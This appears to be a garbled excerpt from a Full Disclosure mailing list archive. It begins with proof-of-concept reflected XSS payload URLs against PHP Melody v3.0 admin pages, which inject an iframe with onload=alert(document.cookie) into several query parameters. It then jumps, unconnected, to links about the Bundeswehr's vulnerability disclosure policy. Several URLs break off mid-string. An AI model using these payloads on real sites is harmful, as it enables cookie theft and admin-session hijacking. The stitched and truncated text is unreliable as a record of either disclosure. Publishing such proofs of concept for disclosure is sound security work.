https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4


PoC: Exploit


PHP Melody v3.0 - XSS PoC Exploit
#1
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E"
 width="200" height="200"> 
#2
https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E"
 width="200" height="200">
&results=50&autofilling=0&autodata=1&oc=1&utc=19&data

[FD] VDPBW Bundeswehr - 1 Year Vulnerability Disclosure Policy of the Bundeswehr

[i...@vulnerability-lab.com]

Title: 1 Year Vulnerability Disclosure Policy of the Bundeswehr - The 
Balance Sheet of the CISOBwChief Information Security Officer
Reference: 
https://www.bundeswehr.de/de/organisation/cyber-und-informationsraum/aktuelles/1-jahr-vdpbw-cisobw-bilanz-5232904 



Title:  VDPBwVulnerability Disclosure Policy der Bundeswehr - COIN
Reference: https://www.bundeswehr.de/de/security-policy/vdpbw-coin

Title:  Im Dienst der IT-Sicherheit (Interview 1st Rank)
Reference: 
https://www.bundeswehr.de/de/organisation/cyber-und-informationsraum/aktuelles/vdpbw-im-dienst-der-it-sicherheit-5233314 



Title: @cirbw - https://twitter.com/cirbw
Reference:
https://twitter.com/cirbw/status/1452590762307334151
https://twitter.com/cirbw/status/145254605418915

--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/